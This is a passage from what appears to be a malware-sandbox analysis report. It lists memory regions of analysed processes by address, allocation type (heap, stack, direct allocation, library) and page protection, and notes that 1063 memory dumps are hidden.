page read and write
|
||
25650B62000
|
heap
|
page read and write
|
||
C00003F000
|
direct allocation
|
page read and write
|
||
1405C690000
|
heap
|
page read and write
|
||
2976C803000
|
heap
|
page read and write
|
||
7FF684961000
|
unkown
|
page read and write
|
||
FDDA3F6000
|
stack
|
page read and write
|
||
1AA49817000
|
heap
|
page read and write
|
||
2976C812000
|
heap
|
page read and write
|
||
25638559000
|
heap
|
page read and write
|
||
1406E320000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
19C7617D000
|
heap
|
page read and write
|
||
14076581000
|
heap
|
page read and write
|
||
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
25638500000
|
trusted library allocation
|
page read and write
|
||
C000053000
|
direct allocation
|
page read and write
|
||
7FF68536E000
|
unkown
|
page readonly
|
||
C00001C000
|
direct allocation
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
C000058000
|
direct allocation
|
page read and write
|
||
19C76184000
|
heap
|
page read and write
|
||
21DE01D9000
|
heap
|
page read and write
|
||
C0003D6000
|
direct allocation
|
page read and write
|
||
2976AC75000
|
direct allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
29745749000
|
heap
|
page read and write
|
||
2976C803000
|
heap
|
page read and write
|
||
1AA4B853000
|
heap
|
page read and write
|
||
C000146000
|
direct allocation
|
page read and write
|
||
25636AA2000
|
heap
|
page read and write
|
||
2976C81A000
|
heap
|
page read and write
|
||
25650D10000
|
heap
|
page read and write
|
||
19C742AF000
|
heap
|
page read and write
|
||
29745A0B000
|
direct allocation
|
page read and write
|
||
1AA49874000
|
heap
|
page read and write
|
||
2976C80B000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
1AA49992000
|
heap
|
page read and write
|
||
1FAF28A6000
|
heap
|
page read and write
|
||
19C742E1000
|
heap
|
page read and write
|
||
7FF6845E3000
|
unkown
|
page write copy
|
||
1AA49F0E000
|
heap
|
page read and write
|
||
7FFD9B99D000
|
trusted library allocation
|
page execute and read and write
|
||
140765D0000
|
heap
|
page read and write
|
||
1FAF28CD000
|
heap
|
page read and write
|
||
FDDA17D000
|
stack
|
page read and write
|
||
1AA49940000
|
trusted library allocation
|
page read and write
|
||
C000216000
|
direct allocation
|
page read and write
|
||
C000126000
|
direct allocation
|
page read and write
|
||
C000080000
|
direct allocation
|
page read and write
|
||
C0001E6000
|
direct allocation
|
page read and write
|
||
21DDFBA2000
|
heap
|
page read and write
|
||
C0002DE000
|
direct allocation
|
page read and write
|
||
C000226000
|
direct allocation
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
1AA49995000
|
heap
|
page read and write
|
||
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
AA28BFC000
|
stack
|
page read and write
|
||
29745A6A000
|
heap
|
page read and write
|
||
1405C75E000
|
heap
|
page read and write
|
||
19C742D9000
|
heap
|
page read and write
|
||
CFBA77F000
|
stack
|
page read and write
|
||
29919018000
|
heap
|
page read and write
|
||
19C742C4000
|
heap
|
page read and write
|
||
1AA49855000
|
heap
|
page read and write
|
||
C000014000
|
direct allocation
|
page read and write
|
||
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA66000
|
trusted library allocation
|
page read and write
|
||
1AA49F19000
|
heap
|
page read and write
|
||
21DE1B10000
|
heap
|
page read and write
|
||
CFBA3FE000
|
stack
|
page read and write
|
||
21DE01B8000
|
heap
|
page read and write
|
||
1AA49897000
|
heap
|
page read and write
|
||
1AA49F08000
|
heap
|
page read and write
|
||
21DDFB78000
|
heap
|
page read and write
|
||
19C742D4000
|
heap
|
page read and write
|
||
2563A68C000
|
trusted library allocation
|
page read and write
|
||
2976C804000
|
heap
|
page read and write
|
||
25636D20000
|
heap
|
page read and write
|
||
19C747A0000
|
heap
|
page read and write
|
||
C000210000
|
direct allocation
|
page read and write
|
||
19C747A0000
|
heap
|
page read and write
|
||
C000338000
|
direct allocation
|
page read and write
|
||
C00043C000
|
direct allocation
|
page read and write
|
||
2563A5C7000
|
trusted library allocation
|
page read and write
|
||
21DE01AF000
|
heap
|
page read and write
|
||
19C742D6000
|
heap
|
page read and write
|
||
19C747A9000
|
heap
|
page read and write
|
||
21DDFBFB000
|
heap
|
page read and write
|
||
1AA4989B000
|
heap
|
page read and write
|
||
21DE0195000
|
heap
|
page read and write
|
||
1AA4B864000
|
heap
|
page read and write
|
||
C000088000
|
direct allocation
|
page read and write
|
||
21DE1B34000
|
heap
|
page read and write
|
||
C000016000
|
direct allocation
|
page read and write
|
||
2FA13CE000
|
stack
|
page read and write
|
||
21DE1B22000
|
heap
|
page read and write
|
||
21DDFBB3000
|
heap
|
page read and write
|
||
1AA498A8000
|
heap
|
page read and write
|
||
C000442000
|
direct allocation
|
page read and write
|
||
2976C7F9000
|
heap
|
page read and write
|
||
21DDFA20000
|
heap
|
page read and write
|
||
1AA49720000
|
heap
|
page read and write
|
||
FDDA0FE000
|
stack
|
page read and write
|
||
1405C695000
|
heap
|
page read and write
|
||
2976C7FB000
|
heap
|
page read and write
|
||
1AA49863000
|
heap
|
page read and write
|
||
C000102000
|
direct allocation
|
page read and write
|
||
C00031E000
|
direct allocation
|
page read and write
|
||
140764F0000
|
heap
|
page execute and read and write
|
||
CFBA7FE000
|
stack
|
page read and write
|
||
1AA49970000
|
heap
|
page read and write
|
||
1AA498A9000
|
heap
|
page read and write
|
||
FE5127F000
|
stack
|
page read and write
|
||
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
2976C7E7000
|
heap
|
page read and write
|
||
2976C810000
|
heap
|
page read and write
|
||
1AA49F19000
|
heap
|
page read and write
|
||
7FF68496E000
|
unkown
|
page readonly
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
1AA49855000
|
heap
|
page read and write
|
||
7FF684919000
|
unkown
|
page read and write
|
||
1407631A000
|
heap
|
page read and write
|
||
FDDA5FE000
|
stack
|
page read and write
|
||
2976C7E7000
|
heap
|
page read and write
|
||
21DDFBB0000
|
heap
|
page read and write
|
||
C00037A000
|
direct allocation
|
page read and write
|
||
2976C7D0000
|
heap
|
page read and write
|
||
C000132000
|
direct allocation
|
page read and write
|
||
1405C5CA000
|
heap
|
page read and write
|
||
7FF6841C1000
|
unkown
|
page execute read
|
||
C00053A000
|
direct allocation
|
page read and write
|
||
21DE01A8000
|
heap
|
page read and write
|
||
1AA49897000
|
heap
|
page read and write
|
||
C000546000
|
direct allocation
|
page read and write
|
||
29745A65000
|
heap
|
page read and write
|
||
21DDFC90000
|
trusted library allocation
|
page read and write
|
||
1405FBCA000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
1AA49833000
|
heap
|
page read and write
|
||
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
C000425000
|
direct allocation
|
page read and write
|
||
29918F50000
|
heap
|
page read and write
|
||
1AA498A4000
|
heap
|
page read and write
|
||
C00024A000
|
direct allocation
|
page read and write
|
||
2976C7D6000
|
heap
|
page read and write
|
||
C000396000
|
direct allocation
|
page read and write
|
||
2976C835000
|
heap
|
page read and write
|
||
FE50F7F000
|
stack
|
page read and write
|
||
1AA49F19000
|
heap
|
page read and write
|
There are 1063 hidden memdumps, click here to show them.